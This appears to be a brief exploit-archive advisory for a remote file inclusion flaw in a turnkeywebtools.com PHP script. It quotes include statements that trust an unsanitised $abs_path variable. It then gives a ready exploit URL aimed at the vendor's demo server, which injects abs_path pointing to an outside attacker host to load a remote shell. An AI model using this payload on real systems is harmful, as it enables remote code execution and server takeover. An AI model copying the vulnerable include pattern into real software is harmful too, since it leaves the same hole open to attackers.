vendor : turnkeywebtools.com by : s3rv3r_hack3r ( alijsb@xxxxxxxxx ) bugz: ++++++++++++++++++++ include/payment/payflow_pro.php > include $abs_path."/include/payment/payflow_pro/pfpro.class.php"; ++++++++++++++++++++ global.php require_once $abs_path."/libsecure.php"; ++++++++++++++++++++ libsecure.php include $abs_path . '/admin/config.php'; ++++++++++++++++++++ EXploit : file.php?abs_path=http://shell for example : http://demos.turnkeywebtools.com/ss4/include/payment/payflow_pro.php?abs_path=http://www.hackerz.ir/?
